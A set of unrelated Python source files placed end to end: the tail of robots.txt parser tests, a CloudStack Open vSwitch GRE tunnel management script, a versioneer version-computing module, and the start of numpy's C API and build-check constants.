http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364 # 8. doc = """ User-agent: Googlebot Allow: /folder1/myfile.html Disallow: /folder1/ """ good = ['/folder1/myfile.html'] bad = ['/folder1/anotherfile.html'] RobotTest(8, doc, good, bad, agent="Googlebot") # 9. This file is incorrect because "Googlebot" is a substring of # "Googlebot-Mobile", so test 10 works just like test 9. doc = """ User-agent: Googlebot Disallow: / User-agent: Googlebot-Mobile Allow: / """ good = [] bad = ['/something.jpg'] RobotTest(9, doc, good, bad, agent="Googlebot") good = [] bad = ['/something.jpg'] RobotTest(10, doc, good, bad, agent="Googlebot-Mobile") # 11. Get the order correct. doc = """ User-agent: Googlebot-Mobile Allow: / User-agent: Googlebot Disallow: / """ good = [] bad = ['/something.jpg'] RobotTest(11, doc, good, bad, agent="Googlebot") good = ['/something.jpg'] bad = [] RobotTest(12, doc, good, bad, agent="Googlebot-Mobile") # 13. Google also got the order wrong in #8. You need to specify the # URLs from more specific to more general. doc = """ User-agent: Googlebot Allow: /folder1/myfile.html Disallow: /folder1/ """ good = ['/folder1/myfile.html'] bad = ['/folder1/anotherfile.html'] RobotTest(13, doc, good, bad, agent="googlebot") # 14. For issue #6325 (query string support) doc = """ User-agent: * Disallow: /some/path?name=value """ good = ['/some/path'] bad = ['/some/path?name=value'] RobotTest(14, doc, good, bad) # 15. For issue #4108 (obey first * entry) doc = """ User-agent: * Disallow: /some/path User-agent: * Disallow: /another/path """ good = ['/another/path'] bad = ['/some/path'] RobotTest(15, doc, good, bad) class NetworkTestCase(unittest.TestCase): def testPasswordProtectedSite(self): support.requires('network') with support.transient_internet('mueblesmoraleda.com'): url = 'http://mueblesmoraleda.com' robots_url = url + "/robots.txt" # First check the URL is usable for our purposes, since the # test site is a bit flaky. try: urlopen(robots_url) except HTTPError as e: if e.code not in {401, 403}: self.skipTest( "%r should return a 401 or 403 HTTP error, not %r" % (robots_url, e.code)) else: self.skipTest( "%r should return a 401 or 403 HTTP error, not succeed" % (robots_url)) parser = urllib.robotparser.RobotFileParser() parser.set_url(url) try: parser.read() except URLError: self.skipTest('%s is unavailable' % url) self.assertEqual(parser.can_fetch("*", robots_url), False) def testPythonOrg(self): support.requires('network') with support.transient_internet('www.python.org'): parser = urllib.robotparser.RobotFileParser( "http://www.python.org/robots.txt") parser.read() self.assertTrue( parser.can_fetch("*", "http://www.python.org/robots.txt")) def test_main(): support.run_unittest(NetworkTestCase) support.run_unittest(tests) if __name__=='__main__': support.verbose = 1 test_main()
#!/usr/bin/python # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # Creates a tunnel mesh across xenserver hosts # Enforces broadcast drop rules on ingress GRE tunnels import cloudstack_pluginlib as lib import logging import commands import os import sys import subprocess import time import json from optparse import OptionParser, OptionGroup, OptParseError, BadOptionError, OptionError, OptionConflictError, OptionValueError from time import localtime as _localtime, asctime as _asctime def setup_ovs_bridge(bridge, key, cs_host_id): res = lib.check_switch() if res != "SUCCESS": #return "FAILURE:%s" % res return 'false' logging.debug("About to manually create the bridge:%s" % bridge) #set gre_key to bridge res = lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:gre_key=%s" % key]) # enable stp lib.do_cmd([lib.VSCTL_PATH, "set", "Bridge", bridge, "stp_enable=true"]) logging.debug("Bridge has been manually created:%s" % res) if res: # result = "FAILURE:%s" % res result = 'false' else: # Verify the bridge actually exists, with the gre_key properly set res = lib.do_cmd([lib.VSCTL_PATH, "get", "bridge", bridge, "other_config:gre_key"]) if key in res: # result = "SUCCESS:%s" % bridge result = 'true' else: # result = "FAILURE:%s" % res result = 'false' lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:is-ovs-tun-network=True"]) #get list of hosts using this bridge conf_hosts = lib.do_cmd([lib.VSCTL_PATH, "get","bridge", bridge,"other_config:ovs-host-setup"]) #add cs_host_id to list of hosts using this bridge conf_hosts = cs_host_id + (conf_hosts and ',%s' % conf_hosts or '') lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:ovs-host-setup=%s" % conf_hosts]) logging.debug("Setup_ovs_bridge completed with result:%s" % result) return result def setup_ovs_bridge_for_distributed_routing(bridge, cs_host_id): res = lib.check_switch() if res != "SUCCESS": return "FAILURE:%s" % res logging.debug("About to manually create the bridge:%s" % bridge) res = lib.do_cmd([lib.VSCTL_PATH, "--", "--may-exist", "add-br", bridge]) logging.debug("Bridge has been manually created:%s" % res) # Non empty result means something went wrong if res: result = "FAILURE:%s" % res else: # Verify the bridge actually exists res = lib.do_cmd([lib.VSCTL_PATH, "list", "bridge", bridge]) res = lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:is-ovs_vpc_distributed_vr_network=True"]) conf_hosts = lib.do_cmd([lib.VSCTL_PATH, "get","bridge", bridge,"other:ovs-host-setup"]) conf_hosts = cs_host_id + (conf_hosts and ',%s' % conf_hosts or '') lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:ovs-host-setup=%s" % conf_hosts]) # add a default flow rule to send broadcast and multi-cast packets to L2 flooding table lib.add_flow(bridge, priority=1000, dl_dst='ff:ff:ff:ff:ff:ff', table=0, actions='resubmit(,2)') lib.add_flow(bridge, priority=1000, nw_dst='224.0.0.0/24', table=0, actions='resubmit(,2)') # add a default flow rule to send uni-cast traffic to L2 lookup table lib.add_flow(bridge, priority=0, table=0, actions='resubmit(,1)') # add a default rule to send unknown mac address to L2 flooding table lib.add_flow(bridge, priority=0, table=1, actions='resubmit(,2)') # add a default rule in L2 flood table to drop packet lib.add_flow(bridge, priority=0, table=2, actions='drop') # add a default rule in egress table to forward packet to L3 lookup table lib.add_flow(bridge, priority=0, table=3, actions='resubmit(,4)') # add a default rule in L3 lookup table to forward packet to L2 lookup table lib.add_flow(bridge, priority=0, table=4, actions='resubmit(,1)') # add a default rule in ingress table to drop in bound packets lib.add_flow(bridge, priority=0, table=5, actions='drop') result = "SUCCESS: successfully setup bridge with flow rules" logging.debug("Setup_ovs_bridge completed with result:%s" % result) return result def destroy_ovs_bridge(bridge): res = lib.check_switch() if res != "SUCCESS": # return res return 'false' res = lib.do_cmd([lib.VSCTL_PATH, "del-br", bridge]) logging.debug("Bridge has been manually removed:%s" % res) if res: # result = "FAILURE:%s" % res result = 'false' else: # result = "SUCCESS:%s" % bridge result = 'true' logging.debug("Destroy_ovs_bridge completed with result:%s" % result) return result def create_tunnel(bridge, remote_ip, key, src_host, dst_host): logging.debug("Entering create_tunnel") res = lib.check_switch() if res != "SUCCESS": logging.debug("Openvswitch running: NO") # return "FAILURE:%s" % res return 'false' # We need to keep the name below 14 characters # src and target are enough - consider a fixed length hash name = "t%s-%s-%s" % (key, src_host, dst_host) # Verify the bridge to be created # NOTE: Timeout should not be necessary anymore wait = [lib.VSCTL_PATH, "--timeout=30", "wait-until", "bridge", bridge, "--", "get", "bridge", bridge, "name"] res = lib.do_cmd(wait) if bridge not in res: logging.debug("WARNING:Can't find bridge %s for creating " + "tunnel!" % bridge) # return "FAILURE:NO_BRIDGE" return 'false' logging.debug("bridge %s for creating tunnel - VERIFIED" % bridge) tunnel_setup = False drop_flow_setup = False try: # Create a port and configure the tunnel interface for it add_tunnel = [lib.VSCTL_PATH, "add-port", bridge, name, "--", "set", "interface", name, "type=gre", "options:key=%s" % key, "options:remote_ip=%s" % remote_ip] lib.do_cmd(add_tunnel) tunnel_setup = True # verify port verify_port = [lib.VSCTL_PATH, "get", "port", name, "interfaces"] res = lib.do_cmd(verify_port) # Expecting python-style list as output iface_list = [] if len(res) > 2: iface_list = res.strip()[1:-1].split(',') if len(iface_list) != 1: logging.debug("WARNING: Unexpected output while verifying " + "port %s on bridge %s" % (name, bridge)) # return "FAILURE:VERIFY_PORT_FAILED" return 'false' # verify interface iface_uuid = iface_list[0] verify_interface_key = [lib.VSCTL_PATH, "get", "interface", iface_uuid, "options:key"] verify_interface_ip = [lib.VSCTL_PATH, "get", "interface", iface_uuid, "options:remote_ip"] key_validation = lib.do_cmd(verify_interface_key) ip_validation = lib.do_cmd(verify_interface_ip) if not key in key_validation or not remote_ip in ip_validation: logging.debug("WARNING: Unexpected output while verifying " + "interface %s on bridge %s" % (name, bridge)) # return "FAILURE:VERIFY_INTERFACE_FAILED" return 'false' logging.debug("Tunnel interface validated:%s" % verify_interface_ip) cmd_tun_ofport = [lib.VSCTL_PATH, "get", "interface", iface_uuid, "ofport"] tun_ofport = lib.do_cmd(cmd_tun_ofport) # Ensure no trailing LF if tun_ofport.endswith('\n'): tun_ofport = tun_ofport[:-1] ovs_tunnel_network = lib.do_cmd([lib.VSCTL_PATH, "get", "bridge", bridge, "other_config:is-ovs-tun-network"]) ovs_vpc_distributed_vr_network = lib.do_cmd([lib.VSCTL_PATH, "get", "bridge", bridge, "other_config:is-ovs_vpc_distributed_vr_network"]) if ovs_tunnel_network == 'True': # add flow entryies for dropping broadcast coming in from gre tunnel lib.add_flow(bridge, priority=1000, in_port=tun_ofport, dl_dst='ff:ff:ff:ff:ff:ff', actions='drop') lib.add_flow(bridge, priority=1000, in_port=tun_ofport, nw_dst='224.0.0.0/24', actions='drop') drop_flow_setup = True if ovs_vpc_distributed_vr_network == 'True': # add flow rules for dropping broadcast coming in from tunnel ports lib.add_flow(bridge, priority=1000, in_port=tun_ofport, table=0, dl_dst='ff:ff:ff:ff:ff:ff', actions='drop') lib.add_flow(bridge, priority=1000, in_port=tun_ofport, table=0, nw_dst='224.0.0.0/24', actions='drop') # add flow rule to send the traffic from tunnel ports to L2 switching table only lib.add_flow(bridge, priority=1000, in_port=tun_ofport, table=0, actions='resubmit(,1)') lib.do_cmd([lib.VSCTL_PATH, "set", "interface", name, "options:cloudstack-network-id=%s" % network_uuid]) logging.debug("Broadcast drop rules added") # return "SUCCESS:%s" % name return 'true' except: logging.debug("An unexpected error occured. Rolling back") if tunnel_setup: logging.debug("Deleting GRE interface") # Destroy GRE port and interface lib.del_port(bridge, name) if drop_flow_setup: # Delete flows logging.debug("Deleting flow entries from GRE interface") lib.del_flows(bridge, in_port=tun_ofport) # This will not cancel the original exception raise def destroy_tunnel(bridge, iface_name): logging.debug("Destroying tunnel at port %s for bridge %s" % (iface_name, bridge)) ofport = get_field_of_interface(iface_name, "ofport") lib.del_flows(bridge, in_port=ofport) lib.del_port(bridge, iface_name) # return "SUCCESS" return 'true' def get_field_of_interface(iface_name, field): get_iface_cmd = [lib.VSCTL_PATH, "get", "interface", iface_name, field] res = lib.do_cmd(get_iface_cmd) return res if __name__ == '__main__': logging.basicConfig(filename="/var/log/cloudstack/agent/ovstunnel.log", format="%(asctime)s - %(message)s", level=logging.DEBUG) parser = OptionParser() parser.add_option("--key", dest="key") parser.add_option("--cs_host_id", dest="cs_host_id") parser.add_option("--bridge", dest="bridge") parser.add_option("--remote_ip", dest="remote_ip") parser.add_option("--src_host", dest="src_host") parser.add_option("--dst_host", dest="dst_host") parser.add_option("--iface_name", dest="iface_name") parser.add_option("--config", dest="config") (option, args) = parser.parse_args() if len(args) == 0: logging.debug("No command to execute") sys.exit(1) cmd = args[0] if cmd == "setup_ovs_bridge": setup_ovs_bridge(option.bridge, option.key, option.cs_host_id) elif cmd == "destroy_ovs_bridge": destroy_ovs_bridge(option.bridge) elif cmd == "create_tunnel": create_tunnel(option.bridge, option.remote_ip, option.key, option.src_host, option.dst_host) elif cmd == "destroy_tunnel": destroy_tunnel(option.bridge, option.iface_name) elif cmd == "setup_ovs_bridge_for_distributed_routing": setup_ovs_bridge_for_distributed_routing(bridge, cs_host_id) elif cmd == "configure_ovs_bridge_for_network_topology": configure_bridge_for_network_topology(brdige, cs_host_id, config) elif cmd == "configure_ovs_bridge_for_routing_policies": configure_ovs_bridge_for_routing_policies(bridge, config) else: logging.debug("Unknown command: " + cmd) sys.exit(1)
# This file helps to compute a version number in source trees obtained from # git-archive tarball (such as those provided by githubs download-from-tag # feature). Distribution tarballs (built by setup.py sdist) and build # directories (produced by setup.py build) will contain a much shorter file # that just contains the computed version number. # This file is released into the public domain. Generated by # versioneer-0.18 (https://github.com/warner/python-versioneer) """Git implementation of _version.py.""" import errno import os import re import subprocess import sys def get_keywords(): """Get the keywords needed to look up the version information.""" # these strings will be replaced by git during git-archive. # setup.py/versioneer.py will grep for the variable names, so they must # each be defined on a line of their own. _version.py will just call # get_keywords(). git_refnames = "$Format:%d$" git_full = "$Format:%H$" git_date = "$Format:%ci$" keywords = {"refnames": git_refnames, "full": git_full, "date": git_date} return keywords class VersioneerConfig: """Container for Versioneer configuration parameters.""" def get_config(): """Create, populate and return the VersioneerConfig() object.""" # these strings are filled in when 'setup.py versioneer' creates # _version.py cfg = VersioneerConfig() cfg.VCS = "git" cfg.style = "" cfg.tag_prefix = "v" cfg.parentdir_prefix = "None" cfg.versionfile_source = "cli/_version.py" cfg.verbose = False return cfg class NotThisMethod(Exception): """Exception raised if a method is not valid for the current scenario.""" LONG_VERSION_PY = {} HANDLERS = {} def register_vcs_handler(vcs, method): # decorator """Decorator to mark a method as the handler for a particular VCS.""" def decorate(f): """Store f in HANDLERS[vcs][method].""" if vcs not in HANDLERS: HANDLERS[vcs] = {} HANDLERS[vcs][method] = f return f return decorate def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None): """Call the given command(s).""" assert isinstance(commands, list) p = None for c in commands: try: dispcmd = str([c] + args) # remember shell=False, so use git.cmd on windows, not just git p = subprocess.Popen([c] + args, cwd=cwd, env=env, stdout=subprocess.PIPE, stderr=(subprocess.PIPE if hide_stderr else None)) break except EnvironmentError: e = sys.exc_info()[1] if e.errno == errno.ENOENT: continue if verbose: print("unable to run %s" % dispcmd) print(e) return None, None else: if verbose: print("unable to find command, tried %s" % (commands,)) return None, None stdout = p.communicate()[0].strip() if sys.version_info[0] >= 3: stdout = stdout.decode() if p.returncode != 0: if verbose: print("unable to run %s (error)" % dispcmd) print("stdout was %s" % stdout) return None, p.returncode return stdout, p.returncode def versions_from_parentdir(parentdir_prefix, root, verbose): """Try to determine the version from the parent directory name. Source tarballs conventionally unpack into a directory that includes both the project name and a version string. We will also support searching up two directory levels for an appropriately named parent directory """ rootdirs = [] for i in range(3): dirname = os.path.basename(root) if dirname.startswith(parentdir_prefix): return {"version": dirname[len(parentdir_prefix):], "full-revisionid": None, "dirty": False, "error": None, "date": None} else: rootdirs.append(root) root = os.path.dirname(root) # up a level if verbose: print("Tried directories %s but none started with prefix %s" % (str(rootdirs), parentdir_prefix)) raise NotThisMethod("rootdir doesn't start with parentdir_prefix") @register_vcs_handler("git", "get_keywords") def git_get_keywords(versionfile_abs): """Extract version information from the given file.""" # the code embedded in _version.py can just fetch the value of these # keywords. When used from setup.py, we don't want to import _version.py, # so we do it with a regexp instead. This function is not used from # _version.py. keywords = {} try: f = open(versionfile_abs, "r") for line in f.readlines(): if line.strip().startswith("git_refnames ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["refnames"] = mo.group(1) if line.strip().startswith("git_full ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["full"] = mo.group(1) if line.strip().startswith("git_date ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["date"] = mo.group(1) f.close() except EnvironmentError: pass return keywords @register_vcs_handler("git", "keywords") def git_versions_from_keywords(keywords, tag_prefix, verbose): """Get version information from git keywords.""" if not keywords: raise NotThisMethod("no keywords at all, weird") date = keywords.get("date") if date is not None: # git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant # datestamp. However we prefer "%ci" (which expands to an "ISO-8601 # -like" string, which we must then edit to make compliant), because # it's been around since git-1.5.3, and it's too difficult to # discover which version we're using, or to work around using an # older one. date = date.strip().replace(" ", "T", 1).replace(" ", "", 1) refnames = keywords["refnames"].strip() if refnames.startswith("$Format"): if verbose: print("keywords are unexpanded, not using") raise NotThisMethod("unexpanded keywords, not a git-archive tarball") refs = set([r.strip() for r in refnames.strip("()").split(",")]) # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of # just "foo-1.0". If we see a "tag: " prefix, prefer those. TAG = "tag: " tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) if not tags: # Either we're using git < 1.8.3, or there really are no tags. We use # a heuristic: assume all version tags have a digit. The old git %d # expansion behaves like git log --decorate=short and strips out the # refs/heads/ and refs/tags/ prefixes that would let us distinguish # between branches and tags. By ignoring refnames without digits, we # filter out many common branch names like "release" and # "stabilization", as well as "HEAD" and "master". tags = set([r for r in refs if re.search(r'\d', r)]) if verbose: print("discarding '%s', no digits" % ",".join(refs - tags)) if verbose: print("likely tags: %s" % ",".join(sorted(tags))) for ref in sorted(tags): # sorting will prefer e.g. "2.0" over "2.0rc1" if ref.startswith(tag_prefix): r = ref[len(tag_prefix):] if verbose: print("picking %s" % r) return {"version": r, "full-revisionid": keywords["full"].strip(), "dirty": False, "error": None, "date": date} # no suitable tags, so version is "0+unknown", but full hex is still there if verbose: print("no suitable tags, using unknown + full revision id") return {"version": "0+unknown", "full-revisionid": keywords["full"].strip(), "dirty": False, "error": "no suitable tags", "date": None} @register_vcs_handler("git", "pieces_from_vcs") def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): """Get version from 'git describe' in the root of the source tree. This only gets called if the git-archive 'subst' keywords were *not* expanded, and _version.py hasn't already been rewritten with a short version string, meaning we're inside a checked out source tree. """ GITS = ["git"] if sys.platform == "win32": GITS = ["git.cmd", "git.exe"] out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True) if rc != 0: if verbose: print("Directory %s not under git control" % root) raise NotThisMethod("'git rev-parse --git-dir' returned error") # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] # if there isn't one, this yields HEX[-dirty] (no NUM) describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty", "--always", "--long", "--match", "%s*" % tag_prefix], cwd=root) # --long was added in git-1.5.5 if describe_out is None: raise NotThisMethod("'git describe' failed") describe_out = describe_out.strip() full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root) if full_out is None: raise NotThisMethod("'git rev-parse' failed") full_out = full_out.strip() pieces = {} pieces["long"] = full_out pieces["short"] = full_out[:7] # maybe improved later pieces["error"] = None # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] # TAG might have hyphens. git_describe = describe_out # look for -dirty suffix dirty = git_describe.endswith("-dirty") pieces["dirty"] = dirty if dirty: git_describe = git_describe[:git_describe.rindex("-dirty")] # now we have TAG-NUM-gHEX or HEX if "-" in git_describe: # TAG-NUM-gHEX mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) if not mo: # unparseable. Maybe git-describe is misbehaving? pieces["error"] = ("unable to parse git-describe output: '%s'" % describe_out) return pieces # tag full_tag = mo.group(1) if not full_tag.startswith(tag_prefix): if verbose: fmt = "tag '%s' doesn't start with prefix '%s'" print(fmt % (full_tag, tag_prefix)) pieces["error"] = ("tag '%s' doesn't start with prefix '%s'" % (full_tag, tag_prefix)) return pieces pieces["closest-tag"] = full_tag[len(tag_prefix):] # distance: number of commits since tag pieces["distance"] = int(mo.group(2)) # commit: short hex revision ID pieces["short"] = mo.group(3) else: # HEX: no tags pieces["closest-tag"] = None count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root) pieces["distance"] = int(count_out) # total number of commits # commit date: see ISO-8601 comment in git_versions_from_keywords() date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[0].strip() pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1) return pieces def plus_or_dot(pieces): """Return a + if we don't already have one, else return a .""" if "+" in pieces.get("closest-tag", ""): return "." return "+" def render_pep440(pieces): """Build up version string, with post-release "local version identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty Exceptions: 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += plus_or_dot(pieces) rendered += "%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" else: # exception #1 rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" return rendered def render_pep440_pre(pieces): """TAG[.post.devDISTANCE] -- No -dirty. Exceptions: 1: no tags. 0.post.devDISTANCE """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += ".post.dev%d" % pieces["distance"] else: # exception #1 rendered = "0.post.dev%d" % pieces["distance"] return rendered def render_pep440_post(pieces): """TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that .dev0 sorts backwards (a dirty tree will appear "older" than the corresponding clean one), but you shouldn't be releasing software with -dirty anyways. Exceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += plus_or_dot(pieces) rendered += "g%s" % pieces["short"] else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += "+g%s" % pieces["short"] return rendered def render_pep440_old(pieces): """TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty. Eexceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" return rendered def render_git_describe(pieces): """TAG[-DISTANCE-gHEX][-dirty]. Like 'git describe --tags --dirty --always'. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render_git_describe_long(pieces): """TAG-DISTANCE-gHEX[-dirty]. Like 'git describe --tags --dirty --always -long'. The distance/hash is unconditional. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render(pieces, style): """Render the given version pieces into the requested style.""" if pieces["error"]: return {"version": "unknown", "full-revisionid": pieces.get("long"), "dirty": None, "error": pieces["error"], "date": None} if not style or style == "default": style = "pep440" # the default if style == "pep440": rendered = render_pep440(pieces) elif style == "pep440-pre": rendered = render_pep440_pre(pieces) elif style == "pep440-post": rendered = render_pep440_post(pieces) elif style == "pep440-old": rendered = render_pep440_old(pieces) elif style == "git-describe": rendered = render_git_describe(pieces) elif style == "git-describe-long": rendered = render_git_describe_long(pieces) else: raise ValueError("unknown style '%s'" % style) return {"version": rendered, "full-revisionid": pieces["long"], "dirty": pieces["dirty"], "error": None, "date": pieces.get("date")} def get_versions(): """Get version information or return default if unable to do so.""" # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have # __file__, we can work backwards from there to the root. Some # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which # case we can only use expanded keywords. cfg = get_config() verbose = cfg.verbose try: return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose) except NotThisMethod: pass try: root = os.path.realpath(__file__) # versionfile_source is the relative path from the top of the source # tree (where the .git directory might live) to this file. Invert # this to find the root from __file__. for i in cfg.versionfile_source.split('/'): root = os.path.dirname(root) except NameError: return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to find root of source tree", "date": None} try: pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose) return render(pieces, cfg.style) except NotThisMethod: pass try: if cfg.parentdir_prefix: return versions_from_parentdir(cfg.parentdir_prefix, root, verbose) except NotThisMethod: pass return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to compute version", "date": None}
from __future__ import division, absolute_import, print_function # Code common to build tools import sys import warnings import copy import binascii from numpy.distutils.misc_util import mingw32 #------------------- # Versioning support #------------------- # How to change C_API_VERSION ? # - increase C_API_VERSION value # - record the hash for the new C API with the script cversions.py # and add the hash to cversions.txt # The hash values are used to remind developers when the C API number was not # updated - generates a MismatchCAPIWarning warning which is turned into an # exception for released version. # Binary compatibility version number. This number is increased whenever the # C-API is changed such that binary compatibility is broken, i.e. whenever a # recompile of extension modules is needed. C_ABI_VERSION = 0x01000009 # Minor API version. This number is increased whenever a change is made to the # C-API -- whether it breaks binary compatibility or not. Some changes, such # as adding a function pointer to the end of the function table, can be made # without breaking binary compatibility. In this case, only the C_API_VERSION # (*not* C_ABI_VERSION) would be increased. Whenever binary compatibility is # broken, both C_API_VERSION and C_ABI_VERSION should be increased. # # 0x00000008 - 1.7.x # 0x00000009 - 1.8.x # 0x00000009 - 1.9.x # 0x0000000a - 1.10.x # 0x0000000a - 1.11.x C_API_VERSION = 0x0000000a class MismatchCAPIWarning(Warning): pass def is_released(config): """Return True if a released version of numpy is detected.""" from distutils.version import LooseVersion v = config.get_version('../version.py') if v is None: raise ValueError("Could not get version") pv = LooseVersion(vstring=v).version if len(pv) > 3: return False return True def get_api_versions(apiversion, codegen_dir): """ Return current C API checksum and the recorded checksum. Return current C API checksum and the recorded checksum for the given version of the C API version. """ # Compute the hash of the current API as defined in the .txt files in # code_generators sys.path.insert(0, codegen_dir) try: m = __import__('genapi') numpy_api = __import__('numpy_api') curapi_hash = m.fullapi_hash(numpy_api.full_api) apis_hash = m.get_versions_hash() finally: del sys.path[0] return curapi_hash, apis_hash[apiversion] def check_api_version(apiversion, codegen_dir): """Emits a MismacthCAPIWarning if the C API version needs updating.""" curapi_hash, api_hash = get_api_versions(apiversion, codegen_dir) # If different hash, it means that the api .txt files in # codegen_dir have been updated without the API version being # updated. Any modification in those .txt files should be reflected # in the api and eventually abi versions. # To compute the checksum of the current API, use # code_generators/cversions.py script if not curapi_hash == api_hash: msg = ("API mismatch detected, the C API version " "numbers have to be updated. Current C api version is %d, " "with checksum %s, but recorded checksum for C API version %d in " "codegen_dir/cversions.txt is %s. If functions were added in the " "C API, you have to update C_API_VERSION in %s." ) warnings.warn(msg % (apiversion, curapi_hash, apiversion, api_hash, __file__), MismatchCAPIWarning, stacklevel=2) # Mandatory functions: if not found, fail the build MANDATORY_FUNCS = ["sin", "cos", "tan", "sinh", "cosh", "tanh", "fabs", "floor", "ceil", "sqrt", "log10", "log", "exp", "asin", "acos", "atan", "fmod", 'modf', 'frexp', 'ldexp'] # Standard functions which may not be available and for which we have a # replacement implementation. Note that some of these are C99 functions. OPTIONAL_STDFUNCS = ["expm1", "log1p", "acosh", "asinh", "atanh", "rint", "trunc", "exp2", "log2", "hypot", "atan2", "pow", "copysign", "nextafter", "ftello", "fseeko", "strtoll", "strtoull", "cbrt", "strtold_l", "fallocate"] OPTIONAL_HEADERS = [ # sse headers only enabled automatically on amd64/x32 builds "xmmintrin.h", # SSE "emmintrin.h", # SSE2 "features.h", # for glibc version linux ] # optional gcc compiler builtins and their call arguments and optional a # required header # call arguments are required as the compiler will do strict signature checking OPTIONAL_INTRINSICS = [("__builtin_isnan", '5.'), ("__builtin_isinf", '5.'), ("__builtin_isfinite", '5.'), ("__builtin_bswap32", '5u'), ("__builtin_bswap64", '5u'), ("__builtin_expect", '5, 0'), ("__builtin_mul_overflow", '5, 5, (int*)5'), ("_mm_load_ps", '(float*)0', "xmmintrin.h"), # SSE ("_mm_prefetch", '(float*)0, _MM_HINT_NTA', "xmmintrin.h"), # SSE ("_mm_load_pd", '(double*)0', "emmintrin.h"), # SSE2 ("__builtin_prefetch", "(float*)0, 0, 3"), ] # function attributes # tested via "int %s %s(void *);" % (attribute, name) # function name will be converted to HAVE_<upper-case-name> preprocessor macro OPTIONAL_FUNCTION_ATTRIBUTES = [('__attribute__((optimize("unroll-loops")))', 'attribute_optimize_unroll_loops'), ('__attribute__((optimize("O3")))', 'attribute_optimize_opt_3'), ('__attribute__((nonnull (1)))', 'attribute_nonnull'), ] # variable attributes tested via "int %s a" % attribute OPTIONAL_VARIABLE_ATTRIBUTES = ["__thread", "__declspec(thread)"] # Subset of OPTIONAL_STDFUNCS which may alreay have HAVE_* defined by Python.h OPTIONAL_STDFUNCS_MAYBE = [ "expm1", "log1p", "acosh", "atanh", "asinh", "hypot", "copysign", "ftello", "fseeko" ] # C99 functions: float and long double versions C99_FUNCS = [ "sin", "cos", "tan", "sinh", "cosh", "tanh", "fabs", "floor", "ceil", "rint", "trunc", "sqrt", "log10", "log", "log1p", "exp", "expm1", "asin", "acos", "atan", "asinh", "acosh", "atanh", "hypot", "atan2", "pow", "fmod", "modf", 'frexp', 'ldexp', "exp2", "log2", "copysign", "nextafter", "cbrt" ] C99_FUNCS_SINGLE = [f + 'f' for f in C99_FUNCS] C99_FUNCS_EXTENDED = [f + 'l' for f in C99_FUNCS] C99_COMPLEX_TYPES = [ 'complex double', 'complex float', 'complex long double' ] 